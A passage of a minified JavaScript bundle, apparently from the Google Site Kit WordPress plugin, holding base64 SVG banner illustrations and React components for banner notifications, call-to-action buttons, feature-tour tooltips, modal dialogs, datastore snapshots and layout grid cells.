AwIDAgMC4xNSAwIi8+CjxmZUJsZW5kIG1vZGU9Im5vcm1hbCIgaW4yPSJCYWNrZ3JvdW5kSW1hZ2VGaXgiIHJlc3VsdD0iZWZmZWN0MV9kcm9wU2hhZG93XzI3MDVfMTc2ODYiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfMjcwNV8xNzY4NiIgcmVzdWx0PSJzaGFwZSIvPgo8L2ZpbHRlcj4KPC9kZWZzPgo8L3N2Zz4K",h="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDAwIiBoZWlnaHQ9IjIwMiIgdmlld0JveD0iMCAwIDQwMCAyMDIiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CjxwYXRoIGQ9Ik04NC44NTc1IDk3LjYxNjZDMTA1Ljg1NyAxMzQuMDIgMTUzLjIwMSAxMDYuMTIzIDE4MS4zNTcgMTE0LjU3MkMyMDkuNTEzIDEyMy4wMiAyMTMuNDY4IDE2MS41NDUgMjM1Ljg1NyAxNjkuOTI1QzI1OC4yNDUgMTc4LjMwNiAzMDMuMDY4IDE3MS41MTUgMzE2LjAwMiAxMzguMTM1QzMyOC45MzYgMTA0Ljc1NCAzMTIuMTY3IDgzLjY1MjkgMjg3LjY1MiA3Mi4xNjk0QzI2My4xMzYgNjAuNjg1OSAyNjguOTc2IDM2Ljc4MzYgMjM0LjE2NiAyNy44MDA5QzE5OS4zNTcgMTguODE4MiAxNzguNjY1IDQxLjI2NTEgMTQwLjE2NSAzMC43OTI3QzEwMS42NjUgMjAuMzIwNCA2My44NTc4IDYxLjIxMzEgODQuODU3NSA5Ny42MTY2WiIgZmlsbD0iI0ZGREVEMyIvPgo8ZyBmaWx0ZXI9InVybCgjZmlsdGVyMF9kXzI3MDVfMTc2MzMpIj4KPHJlY3QgeD0iMTI3LjY2NiIgeT0iMzcuODQxMSIgd2lkdGg9IjEyOCIgaGVpZ2h0PSIxMjguMTk0IiByeD0iNi45ODI1MiIgZmlsbD0iI0VCRUVGMCIvPgo8bWFzayBpZD0ibWFzazBfMjcwNV8xNzYzMyIgc3R5bGU9Im1hc2stdHlwZTphbHBoYSIgbWFza1VuaXRzPSJ1c2VyU3BhY2VPblVzZSIgeD0iMTI3IiB5PSIzNyIgd2lkdGg9IjEyOSIgaGVpZ2h0PSIxMzEiPgo8cmVjdCB4PSIxMjcuNjY2IiB5PSIzNy44NDExIiB3aWR0aD0iMTI4IiBoZWlnaHQ9IjEyOS43OSIgcng9IjYuOTgyNTIiIGZpbGw9IiNERUUzRTYiLz4KPC9tYXNrPgo8ZyBtYXNrPSJ1cmwoI21hc2swXzI3MDVfMTc2MzMpIj4KPHJlY3QgeD0iMTM2LjIiIHk9Ijk3LjQxNjkiIHdpZHRoPSIxMTAuNCIgaGVpZ2h0PSIzMC44NTE4IiByeD0iMy43NTEyOCIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMzYuMiIgeT0iODMuMDU0NiIgd2lkdGg9IjExMC40IiBoZWlnaHQ9IjMwLjg1MTgiIHJ4PSIzLjc1MTI4IiBmaWxsPSIjRjNGNUY3Ii8+CjxwYXRoIGQ9Ik0xMzYuMiAxMzkuNDY3QzEzNi4yIDEzNy4zOTUgMTM3Ljg3OSAxMzUuNzE2IDEzOS45NTEgMTM1LjcxNkgyNDIuODQ5QzI0NC45MiAxMzUuNzE2IDI0Ni42IDEzNy4zOTUgMjQ2LjYgMTM5LjQ2N1YxNjUuOTM1SDEzNi4yVjEzOS40NjdaIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC44OTY2IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMjE0LjU5OSA3NS40NDY3KSIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB3aWR0aD0iMzIiIGhlaWdodD0iMTguODk2NiIgcng9IjIuMzE1NjkiIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3NS4xMzMgNzUuNDQ3NikiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3Qgd2lkdGg9IjMyIiBoZWlnaHQ9IjE4Ljg5NjYiIHJ4PSIyLjMxNTY5IiB0cmFuc2Zvcm09Im1hdHJpeCgxIDAgMCAtMSAxMzUuNjY2IDc1LjQ0NzYpIiBmaWxsPSIjRjNGNUY3Ii8+CjwvZz4KPHBhdGggZD0iTTEyNy42NjYgNDQuODU2N0MxMjcuNjY2IDQxLjAwMDQgMTMwLjc5MyAzNy44NzQyIDEzNC42NDkgMzcuODc0MkgyNDguNTI2QzI1Mi4zODIgMzcuODc0MiAyNTUuNTA4IDQxLjAwMDQgMjU1LjUwOCA0NC44NTY3VjQ4LjQyNjNIMTI3LjY2NlY0NC44NTY3WiIgZmlsbD0id2hpdGUiLz4KPHJlY3QgeD0iMTMyLjk1NiIgeT0iNDEuMzkxNSIgd2lkdGg9IjMuNTI2NjciIGhlaWdodD0iMy41MTczNyIgcng9IjEuNzU4NjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3QgeD0iMTM4LjI0NyIgeT0iNDEuMzkxNSIgd2lkdGg9IjMuNTI2NjciIGhlaWdodD0iMy41MTczNyIgcng9IjEuNzU4NjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3QgeD0iMTQzLjU4IiB5PSI0MS4zOTE1IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUxNzM3IiByeD0iMS43NTg2OCIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxjaXJjbGUgY3g9IjE5MS42NjYiIGN5PSIxMDAuOTE1IiByPSIxNi44IiBmaWxsPSIjQUM0MjIwIiBzdHJva2U9IndoaXRlIiBzdHJva2Utd2lkdGg9IjIuNjY2NjciLz4KPHBhdGggZD0iTTE5Mi45MTQgOTMuOTgxOEgxOTAuNDE4QzE5MC4wOTIgOTMuOTgxOCAxODkuODQzIDk0LjI3MTQgMTg5Ljg5MSA5NC41OTM2TDE5MS4xMzkgMTAyLjk3M0MxOTEuMjI5IDEwMy41OCAxOTIuMTA0IDEwMy41OCAxOTIuMTk0IDEwMi45NzNMMTkzLjQ0MiA5NC41OTM2QzE5My40OSA5NC4yNzE0IDE5My4yNCA5My45ODE4IDE5Mi45MTQgOTMuOTgxOFoiIGZpbGw9IiNGRkRFRDMiLz4KPGNpcmNsZSBjeD0iMTkxLjY2NiIgY3k9IjEwNi43ODIiIHI9IjEuNiIgZmlsbD0iI0ZGREVEMyIvPgo8ZGVmcz4KPGZpbHRlciBpZD0iZmlsdGVyMF9kXzI3MDVfMTc2MzMiIHg9IjExOS4xMzMiIHk9IjMxLjQ0MTEiIHdpZHRoPSIxNDUuMDY3IiBoZWlnaHQ9IjE0NS4yNjEiIGZpbHRlclVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY29sb3ItaW50ZXJwb2xhdGlvbi1maWx0ZXJzPSJzUkdCIj4KPGZlRmxvb2QgZmxvb2Qtb3BhY2l0eT0iMCIgcmVzdWx0PSJCYWNrZ3JvdW5kSW1hZ2VGaXgiLz4KPGZlQ29sb3JNYXRyaXggaW49IlNvdXJjZUFscGhhIiB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMTI3IDAiIHJlc3VsdD0iaGFyZEFscGhhIi8+CjxmZU9mZnNldCBkeT0iMi4xMzMzMyIvPgo8ZmVHYXVzc2lhbkJsdXIgc3RkRGV2aWF0aW9uPSI0LjI2NjY3Ii8+CjxmZUNvbXBvc2l0ZSBpbjI9ImhhcmRBbHBoYSIgb3BlcmF0b3I9Im91dCIvPgo8ZmVDb2xvck1hdHJpeCB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMC4xNSAwIi8+CjxmZUJsZW5kIG1vZGU9Im5vcm1hbCIgaW4yPSJCYWNrZ3JvdW5kSW1hZ2VGaXgiIHJlc3VsdD0iZWZmZWN0MV9kcm9wU2hhZG93XzI3MDVfMTc2MzMiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfMjcwNV8xNzYzMyIgcmVzdWx0PSJzaGFwZSIvPgo8L2ZpbHRlcj4KPC9kZWZzPgo8L3N2Zz4K";var y=i(62540);const M={INFO:"info",ERROR:"error",WARNING:"warning"};function BannerNotification({notificationID:e,type:t=M.INFO,learnMoreLink:i,dismissButton:n,ctaButton:r,gaTrackingEventArgs:s,...d}){const u=(0,c.A)(e,s?.category),{dismissNotification:p}=(0,a.useDispatch)(l.D);let N=d?.svg;return N||t===M.INFO||(N={desktop:void 0,mobile:void 0,verticalPosition:"center"},t===M.WARNING&&(N.desktop=I),t===M.ERROR&&(N.desktop=h)),(0,y.jsx)("div",{className:o()("googlesitekit-banner-notification",`googlesitekit-banner-notification--${t}`),children:(0,y.jsx)(m.xA,{className:"googlesitekit-page-content",children:(0,y.jsx)(m.fI,{children:(0,y.jsx)(m.fh,{size:12,children:(0,y.jsx)(g.A,{learnMoreLink:i&&{...i,onClick:async function(e){u.clickLearnMore(s?.label,s?.value),await(i?.onClick?.(e))}},dismissButton:n&&{...n,onClick:async function(t){await(n?.onClick?.(t)),u.dismiss(s?.label,s?.value),p(e,{...n?.dismissOptions})}},ctaButton:r&&{...r,onClick:async function(t){u.confirm(s?.label,s?.value),await(r?.onClick?.(t)),r?.dismissOnClick&&p(e,{...r?.dismissOptions})}},svg:N,...d})})})})})}BannerNotification.propTypes={notificationID:s().string.isRequired,type:s().oneOf(Object.values(M)),titleIcon:s().node,title:s().string,description:s().oneOfType([s().string,s().node]),learnMoreLink:s().shape(d.A.propTypes),dismissButton:s().shape(p.A.propTypes),ctaButton:s().shape(u.A.propTypes),gaTrackingEventArgs:s().shape({category:s().string,label:s().string,value:s().number})}},68761:(e,t,i)=>{i.d(t,{A:()=>s});var n=i(63696),o=i(62659),r=i(6109);function s(e,t,{viewAction:i="view_notification",confirmAction:s="confirm_notification",dismissAction:a="dismiss_notification",clickLearnMoreAction:l="click_learn_more_link"}={}){const c=(0,o.A)(),g=null!=t?t:`${c}_${e}`;return{view:(0,n.useCallback)((...e)=>(0,r.sx)(g,i,...e),[g,i]),confirm:(0,n.useCallback)((...e)=>(0,r.sx)(g,s,...e),[g,s]),dismiss:(0,n.useCallback)((...e)=>(0,r.sx)(g,a,...e),[g,a]),clickLearnMore:(0,n.useCallback)((...e)=>(0,r.sx)(g,l,...e),[g,l])}}},70301:(e,t,i)=>{i.d(t,{M:()=>n});const n="core/location"},71189:(e,t,i)=>{i.d(t,{A:()=>CTAButton});var n=i(62688),o=i.n(n),r=i(49383),s=i(83366),a=i(62540);function CTAButton({label:e,ariaLabel:t,disabled:i,inProgress:n,onClick:o,href:l,external:c=!1,hideExternalIndicator:g=!1}){if(!e||!o&&!l)return null;let d;return c&&!g&&(d=(0,a.jsx)(s.A,{width:14,height:14})),(0,a.jsx)(r.SpinnerButton,{className:"googlesitekit-banner__cta","aria-label":t,disabled:i||n,isSaving:n,onClick:o,href:l,target:c?"_blank":void 0,trailingIcon:d,children:e})}CTAButton.propTypes={label:o().string,ariaLabel:o().string,disabled:o().bool,inProgress:o().bool,onClick:o().func,href:o().string,dismissOnClick:o().bool,dismissOptions:o().shape({expiresInSeconds:o().number,skipHidingFromQueue:o().bool})}},71264:(e,t,i)=>{i.d(t,{Ay:()=>TourTooltips,R0:()=>I,ei:()=>y});var n=i(15844),o=i(36703),r=i(62688),s=i.n(r),a=i(82871),l=i(50539),c=i(7972),g=i(97345),d=i(65054),u=i(83202),p=i(62659),m=i(62540);const I={options:{arrowColor:"#3c7251",backgroundColor:"#3c7251",overlayColor:"rgba(0, 0, 0, 0.6)",textColor:"#fff",zIndex:2e4},spotlight:{border:"2px solid #3c7251",backgroundColor:"#fff"}},h={back:(0,a.__)("Back","google-site-kit"),close:(0,a.__)("Close","google-site-kit"),last:(0,a.__)("Got it","google-site-kit"),next:(0,a.__)("Next","google-site-kit")},y={disableAnimation:!0,styles:{arrow:{length:8,margin:56,spread:16},floater:{filter:"drop-shadow(rgba(60, 64, 67, 0.3) 0px 1px 2px) drop-shadow(rgba(60, 64, 67, 0.15) 0px 2px 6px)"}}},M={VIEW:"feature_tooltip_view",NEXT:"feature_tooltip_advance",PREV:"feature_tooltip_return",DISMISS:"feature_tooltip_dismiss",COMPLETE:"feature_tooltip_complete"};function TourTooltips({steps:e,tourID:t,gaEventCategory:r,isRepeatable:s,callback:a}){const N=`${t}-step`,f=`${t}-run`,{setValue:j}=(0,l.useDispatch)(c.n),{dismissTour:k,receiveCurrentTour:b}=(0,l.useDispatch)(g.oR),x=(0,l.useRegistry)(),T=(0,p.A)(),v=(0,l.useSelect)(e=>e(c.n).getValue(N)||0),D=(0,l.useSelect)(e=>e(c.n).getValue(f)&&!1===e(g.oR).isTourDismissed(t));(0,n.A)(function(){i.g.document.body.classList.add("googlesitekit-showing-feature-tour",`googlesitekit-showing-feature-tour--${t}`),j(f,!0)});const A=e.map(e=>({disableBeacon:!0,isFixed:!0,placement:"auto",...e}));return(0,m.jsx)(o.Ay,{callback:function(e){!function({index:e,action:t,lifecycle:i,size:n,status:s,type:a}){const l=e+1,c="function"==typeof r?r(T):r;a===o.qY.TOOLTIP&&i===o.VD.TOOLTIP?(0,d.sx)(c,M.VIEW,l):t===o.kl.CLOSE&&i===o.VD.COMPLETE?(0,d.sx)(c,M.DISMISS,l):t===o.kl.NEXT&&s===o.XQ.FINISHED&&a===o.qY.TOUR_END&&n===l&&(0,d.sx)(c,M.COMPLETE,l),i===o.VD.COMPLETE&&s!==o.XQ.FINISHED&&(t===o.kl.PREV&&(0,d.sx)(c,M.PREV,l),t===o.kl.NEXT&&(0,d.sx)(c,M.NEXT,l))}(e);const{action:n,index:l,status:c,step:g,type:u}=e,p=n===o.kl.CLOSE,m=!p&&[o.qY.STEP_AFTER,o.qY.TARGET_NOT_FOUND].includes(u),I=[o.XQ.FINISHED,o.XQ.SKIPPED].includes(c),h=p&&u===o.qY.STEP_AFTER,y=I||h;if(o.qY.STEP_BEFORE===u){let e=g.target;"string"==typeof g.target&&(e=i.g.document.querySelector(g.target)),e?.scrollIntoView?.({block:"center"})}m?function(e,t){j(N,e+(t===o.kl.PREV?-1:1))}(l,n):y&&(i.g.document.body.classList.remove("googlesitekit-showing-feature-tour",`googlesitekit-showing-feature-tour--${t}`),s?(j(f,!1),j(N,null),b(null)):k(t)),a&&a(e,x)},floaterProps:y,locale:h,run:D,stepIndex:v,steps:A,styles:I,tooltipComponent:u.A,continuous:!0,disableOverlayClose:!0,disableScrolling:!0,showProgress:!0})}TourTooltips.propTypes={steps:s().arrayOf(s().object).isRequired,tourID:s().string.isRequired,gaEventCategory:s().oneOfType([s().string,s().func]).isRequired,isRepeatable:s().bool,callback:s().func}},72545:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var n,o=i(63696);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},r.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>o.createElement("svg",r({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 14 14"},e),n||(n=o.createElement("path",{fill:"currentColor",d:"M14 1.41 12.59 0 7 5.59 1.41 0 0 1.41 5.59 7 0 12.59 1.41 14 7 8.41 12.59 14 14 12.59 8.41 7z"})))},76984:(e,t,i)=>{i.d(t,{Q:()=>n});const n={NEW:"new",SUCCESS:"success",WARNING:"warning",INFO:"info",INFO_ALT:"info-alt",ERROR:"error"}},78990:(e,t,i)=>{i.d(t,{P9:()=>y,k:()=>m,mR:()=>h});var n=i(32091),o=i.n(n),r=i(17243),s=i(50539),a=i.n(s),l=i(49993),c=i(6109);const g="CREATE_SNAPSHOT",d="DELETE_SNAPSHOT",u="RESTORE_SNAPSHOT",p="SET_STATE_FROM_SNAPSHOT";function m(e,{keysToSnapshot:t}={}){o()(e,"storeName is required to create a snapshot store.");const i={},n={*deleteSnapshot(){return yield{payload:{},type:d}},*restoreSnapshot(e={}){const{clearAfterRestore:t=!0}=e,{cacheHit:i,value:n}=yield{payload:{},type:u};return i&&(yield{payload:{snapshot:n},type:p},t&&(yield{payload:{},type:d})),i},*createSnapshot(){return yield{payload:{},type:g}}},a={[d]:()=>(0,l.LD)(`datastore::cache::${e}`),[g]:(0,s.createRegistryControl)(i=>()=>{const n=i.stores[e].store.getState(),o=t?.length>0?(0,r.pick)(n,t):n;return(0,l.SO)(`datastore::cache::${e}`,o)}),[u]:()=>(0,l.Gq)(`datastore::cache::${e}`,c.Jg)};return{initialState:i,actions:n,controls:a,reducer:function(e=i,{type:n,payload:o}){if(n===p){const{snapshot:i}=o,{error:n,...r}=i;return t?.length>0?{...e,...r}:r}return e}}}function I(e=a()){return Object.values(e.stores).filter(e=>Object.keys(e.getActions()).includes("restoreSnapshot"))}function h(e=a()){return Promise.all(I(e).map(e=>e.getActions().createSnapshot()))}function y(e=a()){return Promise.all(I(e).map(e=>e.getActions().restoreSnapshot()))}},79961:(e,t,i)=>{i.d(t,{A:()=>r});var n=i(63696),o=i(84895);const r=(0,n.createContext)(o.t)},82246:(e,t,i)=>{i.d(t,{A:()=>d});var n=i(62688),o=i.n(n),r=i(63696),s=i(81276),a=i(49383),l=i(59865),c=i(62540);let g=null;function RefocusableModalDialog({dialogActive:e=!1,refocusQuerySelector:t=null,...i}){const n=(0,r.useCallback)(()=>{setTimeout(()=>{const e=t?document.querySelector(t):g;e&&document.body.contains(e)&&e.focus(),t||(g=null)})},[t]),o=(0,s.A)(e);return(0,r.useEffect)(()=>(!0===o&&!1===e&&n(),()=>{n()}),[o,e,n]),(0,c.jsx)(l.A,{dialogActive:e,...i})}!function(){function e(e){const t=e.target.closest("button, a, input");t&&!t.classList.contains("mdc-dialog__cancel-button")&&(g=t)}void 0!==i.g&&i.g.document&&!i.g._googlesitekitModalFocusTrackerInitialized&&(i.g.document.addEventListener("mousedown",e),i.g.document.addEventListener("keydown",t=>{"Enter"!==t.key&&" "!==t.key||e(t)}),i.g._googlesitekitModalFocusTrackerInitialized=!0)}(),RefocusableModalDialog.propTypes={dialogActive:o().bool,refocusQuerySelector:o().string,...a.Dialog.propTypes};const d=RefocusableModalDialog},82871:e=>{e.exports=googlesitekit.i18n},83202:(e,t,i)=>{i.d(t,{A:()=>TourTooltip});var n=i(28056),o=i.n(n),r=i(4452),s=i.n(r),a=i(62688),l=i.n(a),c=i(82871),g=i(49383);var d=i(72545),u=i(33052),p=i(62540);function TourTooltip({backProps:e,closeProps:t,index:i,primaryProps:r,size:a,step:l,tooltipProps:m}){const I=a>1?function(e){return new Array(null!=e?e:0).fill().map((e,t)=>t)}(a):[];function h(e){return s()("googlesitekit-tooltip-indicator",{active:e===i})}return(0,p.jsx)("div",{className:s()("googlesitekit-tour-tooltip",l.className),...m,children:(0,p.jsxs)(o(),{className:"googlesitekit-tooltip-card",children:[(0,p.jsxs)("div",{className:"googlesitekit-tooltip-body",children:[(0,p.jsx)(u.A,{as:"h2",className:"googlesitekit-tooltip-title",size:"medium",type:"title",children:l.title}),(0,p.jsx)("div",{className:"googlesitekit-tooltip-content",children:l.content})]}),(0,p.jsxs)(n.CardActions,{className:"googlesitekit-tooltip-actions",children:[(0,p.jsx)("ul",{className:"googlesitekit-tooltip-indicators",children:I.map(e=>(0,p.jsx)("li",{className:h(e)},`indicator-${e}`))}),(0,p.jsxs)("div",{className:"googlesitekit-tooltip-buttons",children:[0!==i&&(0,p.jsx)(g.Button,{className:"googlesitekit-tooltip-button",text:!0,...e,children:e.title}),l.cta,r.title&&(0,p.jsx)(g.Button,{className:"googlesitekit-tooltip-button",text:!0,...r,children:r.title})]})]}),(0,p.jsx)(g.Button,{className:"googlesitekit-tooltip-close",icon:(0,p.jsx)(d.A,{width:"14",height:"14"}),onClick:t.onClick,"aria-label":(0,c.__)("Close","google-site-kit"),text:!0,hideTooltipTitle:!0})]})})}TourTooltip.propTypes={backProps:l().object.isRequired,closeProps:l().object.isRequired,index:l().number.isRequired,isLastStep:l().bool.isRequired,primaryProps:l().object.isRequired,size:l().number.isRequired,step:l().shape({content:l().node,title:l().node,cta:l().oneOfType([l().element,l().bool]),className:l().string}).isRequired,tooltipProps:l().object.isRequired}},83366:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var n,o=i(63696);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},r.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>o.createElement("svg",r({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),n||(n=o.createElement("path",{d:"M5 21a2 2 0 0 1-1.425-.575A2 2 0 0 1 3 19V5q0-.825.575-1.4Q4.175 3 5 3h7v2H5v14h14v-7h2v7q0 .825-.6 1.425Q19.825 21 19 21zm4.7-5.3-1.4-1.4L17.6 5H14V3h7v7h-2V6.4z"})))},83891:(e,t,i)=>{i.d(t,{A:()=>h});var n=i(4452),o=i.n(n),r=i(62688),s=i.n(r),a=i(63696),l=i(97513),c=i(62540);function TitleIcon({className:e,children:t}){return(0,c.jsx)("div",{className:o()("googlesitekit-banner__title-icon",e),children:t})}function Title({className:e,children:t}){return(0,c.jsx)("p",{className:o()("googlesitekit-banner__title",e),children:t})}TitleIcon.propTypes={className:s().string,children:s().node},Title.propTypes={className:s().string,children:s().node};var g=i(6109),d=i(41671);function Description({className:e,description:t,learnMoreLink:i,additionalDescription:n,children:r}){return(0,c.jsxs)("div",{className:o()("googlesitekit-banner__description",e),children:[(0,a.isValidElement)(t)?t:"string"==typeof t?(0,c.jsx)("span",{dangerouslySetInnerHTML:(0,g.p9)(t,{ALLOWED_TAGS:["strong","em","br","a"],ALLOWED_ATTR:["href"]})}):t," ",i?.href&&(0,c.jsx)(d.A,{...i}),n&&(0,c.jsx)("div",{className:"googlesitekit-banner__additional-description",children:n}),r]})}function HelpText({className:e,children:t}){return(0,c.jsx)("p",{className:o()("googlesitekit-banner__help-text",e),children:t})}Description.propTypes={className:s().string,description:s().oneOfType([s().string,s().node]),learnMoreLink:s().shape(d.A.propTypes),additionalDescription:s().oneOfType([s().string,s().node]),children:s().node},HelpText.propTypes={className:s().string,children:s().node};var u=i(71189),p=i(61983);function Footer({className:e,children:t}){return(0,c.jsx)("div",{className:o()("googlesitekit-banner__footer",e),children:t})}Footer.propTypes={className:s().string,children:s().node};var m=i(25797);const I=(0,a.forwardRef)(({className:e,titleIcon:t,title:i,description:n,additionalDescription:r,errorText:s,helpText:a,learnMoreLink:g,dismissButton:d,ctaButton:I,svg:h,footer:y},M)=>{const N=(0,l.dv)(),f=N===l.mp||N===l.Lg;let j=null;f&&h?.mobile?j=h.mobile:!f&&h?.desktop&&(j=h.desktop);const k=h?.verticalPosition?h.verticalPosition:"center";return(0,c.jsxs)("div",{ref:M,className:o()("googlesitekit-banner",e),children:[(0,c.jsxs)("div",{className:"googlesitekit-banner__content",children:[t&&(0,c.jsx)(TitleIcon,{children:t}),(0,c.jsx)(Title,{children:i}),(0,c.jsx)(Description,{description:n,learnMoreLink:g,additionalDescription:r}),a&&(0,c.jsx)(HelpText,{children:a}),s&&(0,c.jsx)(m.A,{type:"error",description:s}),(0,c.jsxs)("div",{className:"googlesitekit-notice__action",children:[I&&(0,c.jsx)(u.A,{...I}),d?.onClick&&(0,c.jsx)(p.A,{...d})]})]}),j&&(0,c.jsx)("div",{className:o()("googlesitekit-banner__svg-wrapper",{[`googlesitekit-banner__svg-wrapper--${k}`]:k}),style:{backgroundImage:`url(${j})`}}),y&&(0,c.jsx)(Footer,{children:y})]})});I.propTypes={titleIcon:s().node,title:s().string,description:s().oneOfType([s().string,s().node]),additionalDescription:s().oneOfType([s().string,s().node]),errorText:s().string,helpText:s().string,learnMoreLink:s().shape(d.A.propTypes),dismissButton:s().shape(p.A.propTypes),ctaButton:s().shape(u.A.propTypes),svg:s().shape({desktop:s().elementType,mobile:s().elementType,verticalPosition:s().oneOf(["top","center","bottom"])}),footer:s().node};const h=I},84895:(e,t,i)=>{i.d(t,{G:()=>o,t:()=>n});const n=new Set(i.g?._googlesitekitBaseData?.enabledFeatures||[]);function o(e,t=n){return t instanceof Set&&t.has(e)}},84984:(e,t,i)=>{i.d(t,{fh:()=>Cell,xA:()=>u,fI:()=>g});var n=i(62688),o=i.n(n),r=i(4452),s=i.n(r),a=i(62540);function Cell(e){const{className:t,alignTop:i,alignMiddle:n,alignBottom:o,alignRight:r,alignLeft:l,smAlignRight:c,mdAlignRight:g,lgAlignRight:d,smSize:u,smStart:p,smOrder:m,mdSize:I,mdStart:h,mdOrder:y,lgSize:M,lgStart:N,lgOrder:f,size:j,children:k,...b}=e;return(0,a.jsx)("div",{...b,className:s()(t,"mdc-layout-grid__cell",{"mdc-layout-grid__cell--align-top":i,"mdc-layout-grid__cell--align-middle":n,"mdc-layout-grid__cell--align-bottom":o,"mdc-layout-grid__cell--align-right":r,"mdc-layout-grid__cell--align-left":l,"mdc-layout-grid__cell--align-right-phone":c,"mdc-layout-grid__cell--align-right-tablet":g,"mdc-layout-grid__cell--align-right-desktop":d,[`mdc-layout-grid__cell--span-${j}`]:12>=j&&j>0,[`mdc-layout-grid__cell--span-${M}-desktop`]:12>=M&&M>0,[`mdc-layout-grid__cell--start-${N}-desktop`]:12>=N&&N>0,[`mdc-layout-grid__cell--order-${f}-desktop`]:12>=f&&f>0,[`mdc-layout-grid__cell--span-${I}-tablet`]:8>=I&&I>0,[`mdc-layout-grid__cell--start-${h}-tablet`]:8>=h&&h>0,[`mdc-layout-grid__cell--order-${y}-tablet`]:8>=y&&y>0,[`mdc-layout-grid__cell--span-${u}-phone`]:4>=u&&u>0,[`mdc-layout-grid__cell--start-${p}-phone`]:4>=p&&p>0,[`mdc-layout-grid__cell--order-${m}-phone`]:4>=m&&m>0}),children:k})}Cell.propTypes={smSize:o().number,smStart:o().number,smOrder:o().number,mdSize:o().number,mdStart:o().number,mdOrder:o().number,lgSize:o().number,lgStart:o().number,lgOrder:o().number,size:o().number,alignTop:o().bool,alignMiddle:o().bool,alignBottom:o().bool,alignRight:o().bool,alignLeft:o().bool,smAlignRight:o().bool,mdAlignRight:o().bool,lgAlignRight:o().bool,className:o().string,children:o().node},Cell.defaultProps={className:"",size:0,smSize:0,smStart:0,smOrder:0,mdSize:0,mdStart:0,mdOrder:0,lgSize:0,lgStart:0,lgOrder:0};var l=i(63696);const c=(0,l.forwardRef)(({className:e,children:t,...i},n)=>(0,a.jsx)("div",{ref:n,className:s()("mdc-layout-grid__inner",e),...i,children:t}));c.displayName="Row",c.propTypes={className:o().string,children:o().node},c.defaultProps={className:""};const g=c,d=(0,l.forwardRef)(({alignLeft:e,fill:t,className:i,children:n,collapsed:o,...r},l)=>(0,a.jsx)("div",{className:s()("mdc-layout-grid",i,{"mdc-layout-grid--align-left":e,"mdc-layout-grid--collapsed":o,"mdc-layout-grid--fill":t}),...r,ref:l,children:n}));d.displayName="Grid",d.propTypes={alignLeft:o().bool,fill:o().bool,className:o().string,collapsed:o().bool,children:o().node},d.defaultProps={className:""};const u=d},85149:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var n,o,r=i(63696);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},s.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>r.createElement("svg",s({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor","aria-labelledby":"warning-title warning-desc",viewBox:"0 0 24 24"},e),n||(n=r.createElement("path",{fill:"none",d:"M0 0h24v24H0z"})),o||(o=r.createElement("path",{d:"M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2m1 15h-2v-2h2zm0-4h-2V7h2z"})))},86582:(e,t,i)=>{i.d(t,{A:()=>o});var n=i(20697);function o(e){return n.kz.includes(e)}},88933:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var n,o=i(63696);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},r.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>o.createElement("svg",r({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 43 44"},e),n||(n=o.createElement("g",{fill:"none",fillRule:"evenodd"},o.createElement("path",{fill:"#FBBC05",d:"m2.253 12.252 7.399 5.658A13 13 0 0 0 9 22c0 1.43.229 2.805.652 4.09l-7.4 5.658A22 22 0 0 1 0 22c0-3.506.81-6.814 2.253-9.748"}),o.createElement("path",{fill:"#EA4335",d:"m9.652 17.91-7.4-5.658A21.94 21.94 0 0 1 22 0c5.6 0 10.6 2.1 14.5 5.5l-6.4 6.4C27.9 10.1 25.1 9 22 